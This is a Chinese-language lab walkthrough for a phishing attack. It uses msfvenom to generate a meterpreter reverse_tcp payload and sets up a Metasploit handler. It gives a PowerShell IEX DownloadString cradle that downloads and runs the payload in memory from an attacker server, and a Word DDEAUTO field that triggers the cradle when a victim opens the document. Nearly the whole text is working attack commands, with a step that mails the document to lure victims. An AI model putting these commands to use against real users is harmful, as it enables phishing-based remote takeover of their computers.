MSF&Powershell進行釣魚攻擊
一、Powershell配合MSF無文件攻擊
實驗環境:

本次實驗的大致過程如下:
MSF生成payload并放到靶機能夠訪問的服務器上,攻擊者通過釣魚等方式使靶機執行powershell代碼,靶機反彈到msf監聽的端口上建立會話,由此攻擊者可以利用此會話完成攻擊控制靶機。
實驗步驟:
1. kali生成payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1121 -f psh-reflection >x.ps1
# 生成名為x.ps1的windows/x64/meterpreter/reverse_tcp的payload

2. msf 設置監聽
msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.1.7set lport 1121run# msf開始監聽本機1121端口

將剛剛生成的payload放到公網服務器,確保靶機能夠訪問。

在靶機直接運行powershell腳本,實戰需要其他方式運行此代碼:
powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.6/x.ps1')
# 代碼中的地址為公網地址。通過word域代碼執行powershell腳本調用web服務器poayload
下載到靶機內存中執行

當靶機成功執行以上命令之后,msf會收到會話如下圖,此時已經成功建立會話,可控制靶機。實驗成功;

二、Powershell配合word釣魚

原理:
新建word文檔,調用快捷鍵:CTRL+F9,填寫域代碼:
{DDEAUTO C:\\windows\\system32\\cmd.exe "/k notepad.exe}
然后保存word,再次打開時會執行代碼彈出記事本程序。word可以通過域代碼執行系統命令。本實驗利用word域調用powershell代碼從而建立會話,控制靶機。
本次實驗的大致過程如下:
將MSF生成payload并放到公網(模擬)web服務器上,確保靶機能夠訪問。對靶機進行word釣魚攻擊。當靶機打開word文件,會下載powershell payload到本地并執行,從而建立會話進行無文件攻擊。
實驗步驟:
- kali生成ps腳本:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=1122 -f psh-reflection >x.ps2
# 生成名為x.ps2的windows/x64/meterpreter/reverse_tcp的payload

2. msf 設置監聽
msfconsoleuse exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 192.168.1.7set lport 1122run# msf開始監聽本機1122端口

3.將生成的payload放到公網服務器,確保靶機能夠訪問。

4.在本地新建word文檔設置域(快捷鍵:CTRL+F9),域內代碼為:
DDEAUTO C:\\windows\\system32\\cmd.exe "/k powershell IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.6/x.ps2') "
5.通過釣魚等方式將該word文檔發送到靶機誘使靶機點擊文檔。成功建立會話,可控制靶機。實驗成功:
